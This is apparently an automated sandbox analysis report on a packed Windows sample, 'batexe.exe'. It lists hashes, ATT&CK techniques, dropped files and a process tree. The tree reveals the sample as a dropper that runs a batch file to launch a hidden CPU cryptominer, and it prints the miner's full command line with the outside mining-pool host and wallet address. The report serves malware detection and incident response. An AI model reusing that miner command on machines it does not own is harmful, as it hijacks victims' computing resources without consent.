73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20/02/2024, 19:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
408	b2e.exe
1584	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1312-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 408	1312	batexe.exe	84
PID 1312 wrote to memory of 408	1312	batexe.exe	84
PID 1312 wrote to memory of 408	1312	batexe.exe	84
PID 408 wrote to memory of 3016	408	b2e.exe	85
PID 408 wrote to memory of 3016	408	b2e.exe	85
PID 408 wrote to memory of 3016	408	b2e.exe	85
PID 3016 wrote to memory of 1584	3016	cmd.exe	88
PID 3016 wrote to memory of 1584	3016	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1312
- C:\Users\Admin\AppData\Local\Temp\639C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\639C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\639C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6716.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\639C.tmp\b2e.exe

Filesize
10.9MB

MD5
6b79c2cb629b23085696d412f6a397fd

SHA1
1b7f2cad4a601178320a803ba785f625e4aeed87

SHA256
ea748d74a54db863cb21d43f8cf559ed8197e8ab4157571c6a28a5c0cb245a61

SHA512
9894da23d3e8779a0055b5787b8bb0433a4a5dd9c799e6995bf834de05ff4f6e5ef7408f8bb31568f2fa168c7616834fa4364c37dc8d29dd390234af69244ba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\639C.tmp\b2e.exe

Filesize
5.1MB

MD5
fb2d4fc3636809b2149485c49edff980

SHA1
d52cd6703eac5279ef98006a35122032a37a25d0

SHA256
dc1e314962f4403712cdbee2f217bc33410ce1c2b99919848eb4aa089d54ae87

SHA512
d95ab6a9294f221a5e7c6c92995cad7d17ae026498df28ac981621d021c8dbcb9388ecdecca18fec408598beb47d805d15efe382af525674fcb1a45a89e14f59

Download Submit
C:\Users\Admin\AppData\Local\Temp\639C.tmp\b2e.exe

Filesize
4.3MB

MD5
225ad63ae4285536842ee1ca4b56e051

SHA1
73d1fcf4006c841ffcfa1269566d8543a5aaf7d2

SHA256
23c4e0cec42cfccabe7c01b688e5d50a0d271897860bb8b395ca6e8e6e6fbc13

SHA512
2dbceb2eab4bb328a2f5569013574eb7bb07f0c3539cab08a00e383124a4d08bf414739cc50380b10c8a1079cabc410323d4b1fbe99e61361d3a52372c46d88b

Download Submit
C:\Users\Admin\AppData\Local\Temp\6716.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
256KB

MD5
e0c023f2dc80d8f2415830dcaf9b9e45

SHA1
9806d1f4bd0f76e044071f95f9210b09c2c09fd0

SHA256
dc7de4210ed002ed6ab8340d21f999fd77ff9c1fe4361227ebbe3324b24009a0

SHA512
76d594de32b07899a478e6b1fbe4a158492174439df3a65478b21135aea9695f47cd6b5006d1bb28398fb1b1f0e64f33e839ae16225fe755bcec4d25d3caf0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
669KB

MD5
a9499e9cf9664a3496bb8b1aebe65e05

SHA1
ff42fb7731bf28201fb7701ccfe3160a0eff0fae

SHA256
1d82eb0933eaa4c6153737f91c9aa728a952c7431f9ba3ab2d0cdefe5ec75b9e

SHA512
51f7581ea4775fecbb9086d3d94f15aa6a2d90c90d034e6b888af588250829d980ee3edb1194837a6cd42ba3d44de10f2addfd5ddd515d5adb4d7630578b9eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
642KB

MD5
ea5220826204b569278c56c54622c043

SHA1
861c40621138acb53b41be5bf9f73c92171ae4e4

SHA256
eb15088792094df3ce38d77659c948d47b5147c67e65aa9b12139773b14bbe59

SHA512
27157570c9a2e7f9c7c455f679a7897ebf667ed500a17752f4bdfa46f238e771395f58b90a56cbd1082b7592f9e07dcdf7f26eeca70f704251a2b4ab5ea6b065

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
640KB

MD5
ac7d1c3bb4d3c69372907331267c1ee7

SHA1
fa82689799785ef9ab4c304b1c1a6d2d9a961928

SHA256
d22689ab67764158df7b19e8d78ec1393899f21e390f469a300975a31106c3aa

SHA512
0d541661060d7c5eed486ea0377142e7d3883b3c0935114679af28bcae0b1767585fe06328955cf59aab4fe3d4acfba525dbc42675fbce80b7d0b2300784d125

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
8185100383d0fe360c9198e5a883b08d

SHA1
ab398c469573f8e84d3cfcef01287a0604d6ab5f

SHA256
05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

SHA512
24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
431KB

MD5
65240e57b590fd11d454a68d0e968b18

SHA1
66ce7bd9f132d879fe4d466adb8a9cc50d0d006b

SHA256
96df73e73255c330386d4ce548bcaeaf76a12b8af3cb89d7ddcfa2fda21e1fc0

SHA512
abe1ec4af47326924af3c1ae013393cbbda3bbdde99c94b19b0b2e216d8e3e41bcfa4bf886d489f2d6500f27fbbd55a01ec152d0d9a1c94fcb7b28e300a12944

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
472KB

MD5
b866f026ecf9e86333ac1f9c7c3c0a2f

SHA1
306c63c4bc409dd145482d742d01fc00c42926ec

SHA256
b36d859de95675117cc3260f4a62a4c8e1c724af2e361acc669439457680676c

SHA512
263b9724b23b281534246579b7e020eca435c002cc688f3915bc9e8e561e4aa9b5596d6dd120e03b58b3519d0a9cd7b05d3c637e8419965373849122b7ffaf88

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
355KB

MD5
7e5c784806170182cce81aa4c967ecdb

SHA1
403bd1ba5d0d2f33c20d92d5e0bdfc73413aa81d

SHA256
0a88dc118ea612d37eb42a9f1137f53e66e333add63f78faced89313886edc5b

SHA512
4b046f13000ab55c889f34e51d823e1c02f4fe61495be5737dacfd28e56484d67106686f927f213e006ad8c365b3d904db0c60642eb647c0ae315a562c878a9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
341KB

MD5
327af589664f2c8b494061271e5a46eb

SHA1
529f6465b7bd634fa12da842043a57749ee307b2

SHA256
cc8b8c4525ab9d2e0f567135a65d8ba705e2d679a322e21c7aa6614cd0ecc07b

SHA512
aceb103c05c0e5a68d2547d2191b87f969fb55d4da3bc221870c923d6b987536e80396a8760cd161e600debccdeb9b31fa03e4b9eaccb7f6f0bb52a9092e0fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
371KB

MD5
cf666f2042eb22155a430b8315033db2

SHA1
ec5f6da30d4bb84ae77b98546cb43b43c4640bec

SHA256
57df6b20733a566c3c345382c50e50359fd59fd7132ec59c04de3d564853fd3b

SHA512
6e9690535ced78b14ad2f5be9ef95adf00c5b960921379a321070c479ee088c66c9b59874e685c77925c5a7f2e300e284fb155242093916645eadf9c57e9d603

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
544KB

MD5
9831bb42a4f9c85cd2803333d1b10d80

SHA1
c70241a8b39310d2a8e5b884ddfc6ada113a2c6d

SHA256
26b943a9f4932fa7b0b6c95a166f7cf1c9a17af4f95e71ac61357ca47ed1bc9c

SHA512
74d9297c83cc669be9d18a921c33a43c26c443c57efe5891a0d5f804862a71a823ada2b651ce51bdb632d8a9893a3c2471a2bf5ac72892c5e43eeaaf65aa4b5d

Download Submit
memory/408-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/408-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1312-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1584-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-45-0x00000000598A0000-0x0000000059938000-memory.dmp

Filesize
608KB

Download
memory/1584-47-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/1584-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1584-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1584-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download